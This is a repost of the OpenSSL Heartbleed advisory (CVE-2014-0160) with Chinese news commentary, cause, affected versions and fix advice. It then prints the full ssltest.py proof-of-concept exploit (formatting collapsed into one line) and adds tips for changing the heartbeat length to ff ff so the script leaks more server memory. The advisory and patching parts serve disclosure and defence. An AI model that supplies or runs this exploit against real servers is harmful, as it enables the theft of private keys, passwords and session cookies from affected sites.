OpenSSL Security Advisory [07 Apr 2014]
========================================
TLS heartbeat read overrun (CVE-2014-0160)
==========================================
A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.
Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.
Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.
Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.
1.0.2 will be fixed in 1.0.2-beta2.
在 heartbleed 的官網上有關於 CVE-2014-0160 漏洞的詳細信息,這是關於 OpenSSL 的信息泄漏漏洞導致的安全問題。改 Heartbleed bug 可以讓互聯網的任何人讀取系統保護內存,這種妥協密鑰用於識別服務提供者和加密流量,用戶名和密碼的和實際的內容。該漏洞允許攻擊者竊聽通訊,並通過模擬 服務提供者和用戶來直接從服務提供者盜取數據。
此漏洞為本年度互聯網上最嚴重的安全漏洞,影響至少兩億中國網民。需要在https開頭網址登錄的網站,初步評估有不少於30%的網站中招,其中包括大家最常用的購物、網銀、社交、門戶等知名網站。”
石曉虹介紹說,目前國內使用https的網站都是跟支付和敏感用戶數據相關的。據他了解,今天下午,大量網站已開始緊急修復此OpenSSL高危漏洞,但是修復此漏洞普遍需要半個小時到一個小時時間,大型網站修復時間會更長一些。
石曉虹提醒廣大互聯網服務商,盡快將OpenSSL升級至1.0.1g進行修復。同時建議廣大網友,在此漏洞得到修復前,暫時不要在受到漏洞影響的網站上登錄賬號。
OpenSSL是為網絡通信提供安全及數據完整性的一種安全協議,囊括了主要的密碼算法、常用的密鑰和證書封裝管理功能以及SSL協議,目前正在各大網銀、在線支付、電商網站、門戶網站、電子郵件等重要網站上廣泛使用。
OpenSSL“心臟出血”漏洞利用方式
利用該漏洞,黑客坐在自己家里電腦前,就可以實時獲取到約30%的https開頭網址的用戶登錄賬號和密碼、cookie等敏感數據,影響網銀、知名購物網站等。
漏洞成因
OpenSSL Heartbleed模塊存在一個BUG,當攻擊者構造一個特殊的數據包,滿足用戶心跳包中無法提供足夠多的數據會導致memcpy把SSLv3記錄之后 的數據直接輸出,該漏洞導致攻擊者可以遠程讀取存在漏洞版本的openssl服務器內存中長大64K的數據。
存在該漏洞的版本
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
修復建議
使用低版本SSL的網站,並盡快按如下方案修復該漏洞:
升級OpenSSL 1.0.1g
使用-DOPENSSL_NO_HEARTBEATS參數重新編譯低版本的OpenSSL以禁用Heartbleed模塊
修補方式:OpenSSL "heartbleed" 的安全漏洞
OpenSSL “heartbleed” 漏洞利用程序腳本 POC:
openssl.py / ssltest.py,用法:openssl.py ip/域名 -p 端口
#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)# The author disclaims copyright to this source code.import sys import struct import socket import time import select import re from optparse importOptionParser options =OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p','--port', type='int', default=443, help='TCP port to test (default: 443)')def h2bin(x):return x.replace(' ','').replace('\n','').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''')def hexdump(s):for b in xrange(0, len(s),16): lin =[c for c in s[b : b +16]] hxdat =' '.join('%02X'% ord(c)for c in lin) pdat =''.join((c if32<= ord(c)<=126else'.')for c in lin)print' %04x: %-48s %s'%(b, hxdat, pdat)printdef recvall(s, length, timeout=5): endtime = time.time()+ timeout rdata ='' remain = length while remain >0: rtime = endtime - time.time()if rtime <0:returnNone r, w, e = select.select([s],[],[],5)if s in r: data = s.recv(remain)# EOF?ifnot data:returnNone rdata += data remain -= len(data)return rdata def recvmsg(s): hdr = recvall(s,5)if hdr isNone:print'Unexpected EOF receiving record header - server closed connection'returnNone,None,None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln,10)if pay isNone:print'Unexpected EOF receiving record payload - server closed connection'returnNone,None,Noneprint' ... received message: type = %d, ver = %04x, length = %d'%(typ, ver, len(pay))return typ, ver, pay def hit_hb(s): s.send(hb)whileTrue: typ, ver, pay = recvmsg(s)if typ isNone:print'No heartbeat response received, server likely not vulnerable'returnFalseif typ ==24:print'Received heartbeat response:' hexdump(pay)if len(pay)>3:print'WARNING: server returned more data than it should - server is vulnerable!'else:print'Server processed malformed heartbeat, but did not return any extra data.'returnTrueif typ ==21:print'Received alert:' hexdump(pay)print'Server returned error, likely not vulnerable'returnFalsedef main(): opts, args = options.parse_args()if len(args)<1: options.print_help()return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port))print'Sending Client Hello...' sys.stdout.flush() s.send(hello)print'Waiting for Server Hello...' sys.stdout.flush()whileTrue: typ, ver, pay = recvmsg(s)if typ ==None:print'Server closed connection without sending Server Hello.'return# Look for server hello done message.if typ ==22and ord(pay[0])==0x0E:breakprint'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s)if __name__ =='__main__': main()
下載地址:
openssl.py.rar,ssltest.py.rar,(提示:其實這倆文件內容完全一樣,只是換行符制式不一樣。)
提示:
poc作者留了一手,每次只dump 16kb 內存。
那個python poc里面的:
hb = h2bin(''' 18 03 02 00 03 01 40 00 ''')改成 hb = h2bin(''' 18 03 02 00 03 01 ff ff ''')
for b in xrange(0, len(s),16):改成for b in xrange(0, len(s),64):